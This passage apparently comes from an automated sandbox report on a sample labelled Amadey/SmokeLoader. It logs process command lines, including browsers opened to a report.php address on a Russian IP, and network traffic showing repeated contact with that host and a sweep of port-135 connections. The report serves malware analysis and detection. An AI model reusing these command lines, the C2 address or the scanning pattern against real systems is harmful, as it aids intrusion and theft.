| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3518521428-3897247806-4080064211-1000\{06510F15-9D65-45BF-ACCA-7125EFA07FDB} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe
"C:\Users\Admin\AppData\Local\Temp\2025-07-04_d6310f3d1f2f5367872a365831a4064f_amadey_elex_smoke-loader.exe"
C:\Program Files\Internet Explorer\IEXPLORE.exe
"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://212.33.237.86/images/1/report.php"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffbbd47f208,0x7ffbbd47f214,0x7ffbbd47f220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2108,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1772,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2372,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3348,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3372,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4088,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4076,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4172 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4124,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=3324,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:9
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3588,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3384 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2420,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3616,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5408,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6024 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1144
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6520,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6492,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6248,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6768 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6236,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6476 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7156,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=7224 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7412,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=7256 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=5244,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=3420,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4496,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3392 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5464 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4900,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6864 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=5824,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4656,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:14
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ÔN@
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4424,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=868,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3568,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4400,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5132,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5128 /prefetch:10
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,343904752234592247,4363518506208910515,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| RU | 212.33.237.86:80 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| RU | 212.33.237.86:80 | tcp | |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 216.58.212.238:443 | clients2.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:443 | tcp | |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| GB | 2.18.27.92:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| RU | 212.33.237.86:443 | tcp | |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.20.12.74:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| RU | 212.33.237.86:443 | tcp | |
| GB | 2.18.27.89:443 | www.bing.com | tcp |
| RU | 212.33.237.86:443 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:80 | tcp | |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| GB | 2.18.27.89:443 | www.bing.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| RU | 212.33.237.86:80 | tcp | |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| GB | 2.18.27.95:443 | www.bing.com | udp |
| US | 199.232.214.172:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 209.76.60.1:135 | tcp | |
| US | 209.76.60.2:135 | tcp | |
| US | 209.76.60.3:135 | tcp | |
| US | 209.76.60.4:135 | tcp | |
| US | 209.76.60.5:135 | tcp | |
| US | 209.76.60.6:135 | tcp | |
| US | 209.76.60.7:135 | tcp | |
| US | 209.76.60.8:135 | tcp | |
| US | 209.76.60.9:135 | tcp | |
| US | 209.76.60.10:135 | tcp | |
| US | 209.76.60.11:135 | tcp | |
| US | 209.76.60.12:135 | tcp | |
| US | 209.76.60.13:135 | tcp | |
| US | 209.76.60.14:135 | tcp | |
| US | 209.76.60.15:135 | tcp | |
| US | 209.76.60.16:135 | tcp | |
| US | 209.76.60.17:135 | tcp | |
| US | 209.76.60.18:135 | tcp | |
| US | 209.76.60.19:135 | tcp | |
| US | 209.76.60.20:135 | tcp | |
| US | 209.76.60.21:135 | tcp | |
| US | 209.76.60.22:135 | tcp | |
| US | 209.76.60.23:135 | tcp | |
| US | 209.76.60.24:135 | tcp | |
| US | 209.76.60.25:135 | tcp | |
| US | 209.76.60.26:135 | tcp | |
| US | 209.76.60.27:135 | tcp | |
| US | 209.76.60.28:135 | tcp | |
| US | 209.76.60.29:135 | tcp | |
| US | 209.76.60.30:135 | tcp | |
| US | 209.76.60.31:135 | tcp | |
| US | 209.76.60.32:135 | tcp | |
| US | 209.76.60.33:135 | tcp | |
| US | 209.76.60.34:135 | tcp | |
| US | 209.76.60.35:135 | tcp | |
| US | 209.76.60.36:135 | tcp | |
| US | 209.76.60.37:135 | tcp | |
| US | 209.76.60.38:135 | tcp | |
| US | 209.76.60.39:135 | tcp | |
| US | 209.76.60.40:135 | tcp | |
| US | 209.76.60.41:135 | tcp | |
| US | 209.76.60.42:135 | tcp | |
| US | 209.76.60.43:135 | tcp | |
| US | 209.76.60.44:135 | tcp | |
| US | 209.76.60.45:135 | tcp | |
| US | 209.76.60.46:135 | tcp | |
| US | 209.76.60.47:135 | tcp | |
| US | 209.76.60.48:135 | tcp | |
| US | 209.76.60.49:135 | tcp | |
| US | 209.76.60.50:135 | tcp | |
| US | 209.76.60.51:135 | tcp | |
| US | 209.76.60.52:135 | tcp | |
| US | 209.76.60.53:135 | tcp | |
| US | 209.76.60.54:135 | tcp | |
| US | 209.76.60.55:135 | tcp | |
| US | 209.76.60.56:135 | tcp | |
| US | 209.76.60.57:135 | tcp | |
| US | 209.76.60.58:135 | tcp | |
| US | 209.76.60.59:135 | tcp | |
| US | 209.76.60.60:135 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 209.76.60.61:135 | tcp | |
| US | 209.76.60.62:135 | tcp | |
| US | 209.76.60.63:135 | tcp | |
| US | 209.76.60.64:135 | tcp | |
| US | 209.76.60.65:135 | tcp | |
| US | 209.76.60.66:135 | tcp | |
| US | 209.76.60.67:135 | tcp | |
| US | 209.76.60.68:135 | tcp | |
| US | 209.76.60.69:135 | tcp | |
| US | 209.76.60.70:135 | tcp | |
| US | 209.76.60.71:135 | tcp | |
| US | 209.76.60.72:135 | tcp | |
| US | 209.76.60.73:135 | tcp | |
| US | 209.76.60.74:135 | tcp | |
| US | 209.76.60.75:135 | tcp | |
| US | 209.76.60.76:135 | tcp | |
| US | 209.76.60.77:135 | tcp | |
| US | 209.76.60.78:135 | tcp | |
| US | 209.76.60.79:135 | tcp | |
| US | 209.76.60.80:135 | tcp | |
| US | 209.76.60.81:135 | tcp | |
| US | 209.76.60.82:135 | tcp | |
| US | 209.76.60.83:135 | tcp | |
| US | 209.76.60.84:135 | tcp | |
| US | 209.76.60.85:135 | tcp | |
| US | 209.76.60.86:135 | tcp | |
| US | 209.76.60.87:135 | tcp | |
| US | 209.76.60.88:135 | tcp | |
| US | 209.76.60.89:135 | tcp | |
| US | 209.76.60.90:135 | tcp | |
| US | 209.76.60.91:135 | tcp | |
| US | 209.76.60.92:135 | tcp | |
| US | 209.76.60.93:135 | tcp | |
| US | 209.76.60.94:135 | tcp | |
| US | 209.76.60.95:135 | tcp | |
| US | 209.76.60.96:135 | tcp | |
| US | 209.76.60.97:135 | tcp | |
| US | 209.76.60.98:135 | tcp | |
| US | 209.76.60.99:135 | tcp | |
| US | 209.76.60.100:135 | tcp | |
| US | 209.76.60.101:135 | tcp | |
| US | 209.76.60.102:135 | tcp | |
| US | 209.76.60.103:135 | tcp | |
| US | 209.76.60.104:135 | tcp | |
| US | 209.76.60.105:135 | tcp | |
| US | 209.76.60.106:135 | tcp | |
| US | 209.76.60.107:135 | tcp | |
| US | 209.76.60.108:135 | tcp | |
| US | 209.76.60.109:135 | tcp | |
| US | 209.76.60.110:135 | tcp | |
| US | 209.76.60.111:135 | tcp | |
| US | 209.76.60.112:135 | tcp | |
| US | 209.76.60.113:135 | tcp | |
| US | 209.76.60.114:135 | tcp | |
| US | 209.76.60.115:135 | tcp | |
| US | 209.76.60.116:135 | tcp | |
| US | 209.76.60.117:135 | tcp | |
| US | 209.76.60.118:135 | tcp | |
| US | 209.76.60.119:135 | tcp | |
| US | 209.76.60.120:135 | tcp | |
| US | 209.76.60.121:135 | tcp | |
| US | 209.76.60.122:135 | tcp | |
| US | 209.76.60.123:135 | tcp | |
| US | 209.76.60.124:135 | tcp | |
| US | 209.76.60.125:135 | tcp | |
